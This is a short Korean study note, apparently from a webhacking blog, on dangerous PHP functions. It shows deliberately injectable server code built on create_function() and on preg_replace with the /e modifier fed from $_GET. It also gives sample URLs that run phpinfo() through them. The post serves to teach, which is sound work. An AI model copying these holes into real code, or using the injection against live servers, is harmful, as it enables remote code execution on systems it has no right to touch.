webhacking/etc
php 취약 함수 관련
qkqhxla1
2015. 8. 21. 17:35
일반적인 취약한 함수.
http://stackoverflow.com/questions/3115559/exploitable-php-functions
http://web.securityinnovation.com/appsec-weekly/blog/bid/79067/Disable-Dangerous-Functions-in-PHP
http://blog.naver.com/postmebi/90173864551
등등 검색하면 많이나옴.
요런것도 있다.
http://www.80sec.com/php-create_function-commond-injection-vulnerability.html
create_function()으로도 쉘 실행시키는게 가능하다고 함.
서버 구성.(index.php)
<?php create_function('$a', 'return $a[0];}' . $_GET['a'] . ';/*];'); ?>
아래처럼 보내보면 phpinfo()가 실행된다.
http://localhost/index.php?a=phpinfo();
워게임이나 ctf에 자주 보이는 preg_replace()도 주의할것. e옵션으로 php함수 실행 가능.
구분자가 //인데 //말고 {}등의 다른 구분자도 쓰일 수 있음.
<?php preg_replace("//e",$_GET[foo],"");?>
http://localhost/index.php?foo=phpinfo()
처럼 실행.